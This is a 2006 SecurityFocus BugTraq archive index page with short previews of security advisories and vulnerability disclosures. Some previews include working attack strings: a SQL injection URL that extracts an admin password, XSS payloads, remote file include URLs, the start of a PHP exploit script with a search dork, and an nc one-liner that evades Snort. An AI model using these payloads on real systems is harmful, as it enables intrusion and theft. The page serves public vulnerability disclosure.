BugTraq Mode:
(Page 1131 of 1748)  < Prev  1126 1127 1128 1129 1130 1131 1132 1133 1134 1135 1136  Next >
[SECURITY] [DSA 1087-1] New PostgreSQL packages fix encoding vulnerabilities 2006-06-03
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1087-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
June 3rd, 2006

[ more ]  [ reply ]
Re: OaBoard 1.0 Remote File inclusion 2006-05-31
Botan Rizgar (botan linuxmail org)
http://evuln.com/vulns/3/exploit.html look :]

--
_______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.

Powered by Outblaze

[ more ]  [ reply ]
Re: WBB<--v2.3.4"misc.php" SQL injection Vulnerability 2006-05-31
nukedx nukedx com
Sorry but i didnt see any SQL injection with your example.

I tried all ways and did not get any result or error from SQL server.

Could you please show me injection that you found.

and vulnerable codes in misc.php

Regards,

Mustafa Can Bjorn IPEKCI

[ more ]  [ reply ]
Pixelpost <= 1-5rc1-2 multiple vulnerabilities 2006-06-03
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on

<?

echo "Pixelpost <= 1-5rc1-2 privilege escalation exploit\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n";

echo "dork: pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"\r\n\r\n";

/*

works wit

[ more ]  [ reply ]
Re: Re: # MHG Security Team --- PHP NUKE All version Remote File Inc. 2006-06-02
Steven M. Christey (coley mitre org)


>include("../../../mainfile.php");
>
>include($phpbb_root_path.'common.'.$phpEx);
>
>...
>
>in mainfile.php at lines 54-56
>
>...
>
>import_request_variables('GPC');

Oh, OK - now that makes sense. This looks like one aspect of the
"globals overwrite" problem as originally documented by Stefan E

[ more ]  [ reply ]
rPSA-2006-0091-1 firefox thunderbird 2006-06-02
Justin M. Forbes (jmforbes rpath com)
rPath Security Advisory: 2006-0091-1
Published: 2006-06-02
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Local User Deterministic Vulnerability
Updated Versions:
firefox=/conary.rpath.com@rpl:devel//1/1.5.0.4-1-0.1
thunderbird=/conary.rpath.com@rpl:devel//1/1.5.0.4

[ more ]  [ reply ]
[DRUPAL-SA-2006-006] Drupal 4.6.7 / 4.7.1 fixes arbitrary file execution issue 2006-06-02
Uwe Hermann (uwe hermann-uwe de)
------------------------------------------------------------------------
----
Drupal security advisory DRUPAL-SA-2006-006
------------------------------------------------------------------------
----
Advisory ID: DRUPAL-SA-2006-006
Project: Drupal core
Date:

[ more ]  [ reply ]
[DRUPAL-SA-2006-008] Drupal 4.6.8 / 4.7.2 fixes XSS issue 2006-06-02
Uwe Hermann (uwe hermann-uwe de)
------------------------------------------------------------------------
----
Drupal security advisory DRUPAL-SA-2006-008
------------------------------------------------------------------------
----
Advisory ID: DRUPAL-SA-2006-008
Project: Drupal core
Date:

[ more ]  [ reply ]
[DRUPAL-SA-2006-007] Drupal 4.6.8 / 4.7.2 fixes arbitrary file execution issue 2006-06-02
Uwe Hermann (uwe hermann-uwe de)
------------------------------------------------------------------------
----
Drupal security advisory DRUPAL-SA-2006-007
------------------------------------------------------------------------
----
Advisory ID: DRUPAL-SA-2006-007
Project: Drupal core and an

[ more ]  [ reply ]
[DRUPAL-SA-2006-005] Drupal 4.6.7 / 4.7.1 fixes SQL injection issue 2006-06-02
Uwe Hermann (uwe hermann-uwe de)
------------------------------------------------------------------------
----
Drupal security advisory DRUPAL-SA-2006-005
------------------------------------------------------------------------
----
Advisory ID: DRUPAL-SA-2006-005
Project: Drupal core
Date:

[ more ]  [ reply ]
# MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit 2006-06-02
erne ayaz (beceriksiz1986 hotmail com)
# Milli-Harekat Advisory ( www.milli-harekat.org )

# MyBloggie <= 2.1.1 version - Remote File Include Vulnerabilities

# Risk : meduim

# Class: Remote

# Script : MyBloggie 2.1.1 version

# Msn : erne [at] ernealizm.com

# Credits : ERNE

# Thanks : Dj_ReMix,Eskobar,Blackened,TR_IP,ßy
KorsaN,OsL3

[ more ]  [ reply ]
Pro Publish SQL Injection and XSS Vulnerabilities 2006-06-02
Soothackers gmail com
---------------------------------------------

Pro Publish SQL Injection and XSS Vulnerabilities

---------------------------------------------

Site:

http://www.deltascripts.com/download/

Bug:

1. SQL Injection :

http://victim/propublish/cat.php?catid='

2. XSS :

1- http:

[ more ]  [ reply ]
new bug 2006-06-02
webmaster azhteam com
################ Azhteam Digital Security Team #################

#

# ASHOPKART20

#

# Find by Soltan_defacer

# Greetings; s.defacer - azhteam - lvl3hr

#

#

# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Contact: soltan_defacer (at) yahoo (dot) com [email concealed] or http://www.azhteam.com

#

[ more ]  [ reply ]
[SECURITY] [DSA 1086-1] New xmcd packages fix denial of service 2006-06-02
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1086-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
June 2nd, 2006

[ more ]  [ reply ]
MyTrueHood.com - XSS 2006-06-02
luny youfucktard com
MyTrueHood.com

Homepage:

http://www.mytruehood.com

Effected files:

Input boxes of submitting a comment and signing a guestbook

XSS proof of concept:

put <IMG SRC="javascript:alert('XSS');"> in the signing aguestbook or leaving a comment in a blog box.

[ more ]  [ reply ]
aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit 2006-06-02
ajannhwt hotmail com
<!--

# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection

# Author : ajann

# Dork : aspWebLinks 2.0

SQL INJECTION:

http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%2
0select+0,administrativepassword,0,0,0,0,0,0,0+from+config

-->

[ more ]  [ reply ]
New Snort Bypass - Patch - Bypass of Patch 2006-06-02
Sigint Consulting (info sigint-consulting com) (1 replies)
There was a Snort evasion bug posted on BugTraq today
http://www.securityfocus.com/archive/1/435600/30/0/threaded

This attack will not show up in alert file at all
perl -e 'print "GET \x90\x90\x0d http/1.0\r\n\r\n"'|nc 192.168.1.3 80

Notice the \x0d CR character (\r) above.

The following will sho

[ more ]  [ reply ]
Re: New Snort Bypass - Patch - Bypass of Patch 2006-06-02
M. Dodge Mumford (dodge nfr net)
Redaxo CMS <= 3.2 Remote File Include 2006-06-02
beford (xbefordx gmail com)
Script: Redaxo CMS
Vendor: http://www.redaxo.de
Discovered: beford <xbefordx gmail com>

Redaxo 3.2 - 3.1 - 3.0

./redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PAT
H]=attacker

Redaxo 3.0

./redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/index
.inc.php?subpage=r

[ more ]  [ reply ]
Re: Jiwa Financials - Reporting allows execution of arbitrary reports as SQL user with full permissions. 2006-06-02
mikes jiwa com au
Secunia security advisory categorises it as "less critical" :

http://secunia.com/advisories/20342/

I'm not going to argue with experts - our categorisation of the risk

level stays as it is.

Original report (which has been edited) claimed it was a remote exploit

- this is false, and seems to

[ more ]  [ reply ]
Bytehoard 2.1 Remote File Include 2006-06-02
beford (xbefordx gmail com)
Script: Bytehoard 2.1 Epsilon/Delta www.bytehoard.org
Discovered: beford <xbefordx gmail com>
File: ./bytehoard/includes/webdav/server.php
Vuln: Remote File Include

[code]
require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
[/code]

http://url.com/bytehoard/includes/webda

[ more ]  [ reply ]
PHP ManualMaker v1.0 2006-06-02
luny youfucktard com
PHP ManualMaker v1.0

Homepage:

http://deltascripts.com/phpmanualmaker/

Effected files:

index.php

Search boxes

Comment boxes

XSS proof of concept:

Input in search or comment box:

">">">'><IMG SRC=javascript:alert('XSS')><""><'<"

XSS via URL injection of id:

http:/

[ more ]  [ reply ]
newsfactory Cross Site Scripting & SQL injection 2006-06-02
CrAzY CrAcKeR hotmail com
===================================

Discovery By: CrAzY CrAcKeR

Site: www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-LoverHacker-BoNy_m

Breeeeh-Rootshil-LiNuX_rOOt-SauDiVirUS

===================================

Example:-

/vorstellung.php?id=[sql]

/vorstellung.php?

[ more ]  [ reply ]
Weblog Oggi v1.0 2006-06-02
luny youfucktard com
Weblog Oggi v1.0

Homepage:

http://www.hotwebscripts.com/index.php

User input isn't sanatized before being dynamically generated. For proof of concept just put <IMG SRC="javascript:alert('XSS');"> in as a comment

[ more ]  [ reply ]
VMSA-2006-0002 - VMware Server sensitive information lifetime issue 2006-06-02
VMware Security Team (security vmware com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------
VMware Security Advisory

Advisory ID: VMSA-2006-0002
Synopsis: VMware Server sensitive information lifetime issue
Advisory URL: http://www.vmwa

[ more ]  [ reply ]
Re: Re: # MHG Security Team --- PHP NUKE All version Remote File Inc. 2006-06-02
nukedx nukedx com
Yeah,its so weird. vulnerable code in pagestart.php at line 68.

http://victim/modules/Forums/admin/admin_styles.php?phpbb_root_path=2

Warning: main(2common.php): failed to open stream: No such file or directory in C:\Inetpub\vhosts\victim\httpdocs\modules\Forums\admin\pagestart.php on line 68

Jus

[ more ]  [ reply ]
Re: my Web Server << v-1.0 Denial of Service Exploit 2006-06-01
Steven M. Christey (coley mitre org)

str0ke asked:

>Is this the same vulnerability?
>http://www.securityfocus.com/bid/5954

Well, let's see. Short answer is "probably not because they don't
seem to be the same product."

The most recent disclosure points to "MY Web Server" at
http://eitsop.s5.com/, which links to source code in a

[ more ]  [ reply ]
northstudio Cross Site Scripting Vulnerability 2006-06-02
CrAzY CrAcKeR hotmail com
===================================

Discovery By: CrAzY CrAcKeR

Site: www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-LoverHacker-BoNy_m

Breeeeh-Rootshil-LiNuX_rOOt-SauDiVirUS

===================================

Example:-

/rpt_menu.php?mnuId=[XSS]

===============

[ more ]  [ reply ]
(Page 1131 of 1748)  < Prev  1126 1127 1128 1129 1130 1131 1132 1133 1134 1135 1136  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus